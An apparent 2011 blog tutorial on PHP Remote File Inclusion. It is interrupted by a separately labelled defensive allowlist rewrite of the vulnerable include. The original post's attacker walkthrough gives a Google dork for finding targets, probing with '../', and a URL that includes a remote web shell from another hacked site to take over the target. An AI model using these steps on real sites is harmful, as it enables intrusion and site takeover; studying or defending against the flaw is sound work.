Monday, October 17, 2011

RFI (Remote File Inclusion)


Remote File Inclusion (RFI) is a type of vulnerability found in some websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to code execution on the web server.
The main cause is the use of unvalidated external variables. The most notable case is the include statement.
The vulnerable code looks like:

<?php
  include($_GET['page']);
?>
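
The same include rewritten with an allowlist, as an added example that is not code from the original post. The page keys, file names and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example, not from the original post. The page keys, file names and
// the pages/ directory are assumptions for illustration.
//
// Vulnerable form from the post: include($_GET['page']);
// php.ini should also keep allow_url_include = Off so include() refuses
// http:// and ftp:// sources; the allowlist below additionally stops "../".

const PAGES_DIR = __DIR__ . '/pages';

// Public page keys mapped to fixed files; request input never becomes a path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    // Rejects arrays (?page[]=x), "../", URLs and any key not listed above.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside PAGES_DIR
    // (catches a symlink planted in pages/ that points elsewhere).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

With this in place, the value of page= is only ever used as a lookup key, so the ../ and URL inputs described in this post end in a 404 instead of reaching include.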
 

To attack, what you do is search for a site.
Example: using the Google dork inurl:php?page=, or some kind of URL that looks like:
www.site.com/somefile.php?page=www.somesite.com
Well, we won't find RFI-vulnerable sites these days; you may find 1 or 2 in a million, or maybe not. This is for educational purposes only, but I will be explaining it with screenshots.

Step 1: Find the vulnerable site.
Then place ../ at the end of the URL (remove the content in page=), like this:
Ex: www.site.com/somefile.php?page=../

If it shows some kind of error like:

Warning: file(../) [function.file]: failed to open stream: Permission denied in\\systemname\users\ in line.


Then it is vulnerable to RFI.
Sometimes, if you are lucky, you can check directly by inserting another URL.
Ex: www.site.com/file.php?page=www.google.com

That's it. Now, to take over this site, all you need is a SHELL. A shell is like an unauthorized backdoor control panel for a website, and it should have the .txt extension.

(* I'm not responsible for any of your actions; for educational purposes only. *)

Now put it in the URL like: www.site.com/file.php?id=http://www.site.com/shell.txt

This shell.txt comes from another site which you have already hacked and uploaded the txt file to.

You will find something like this: tada!


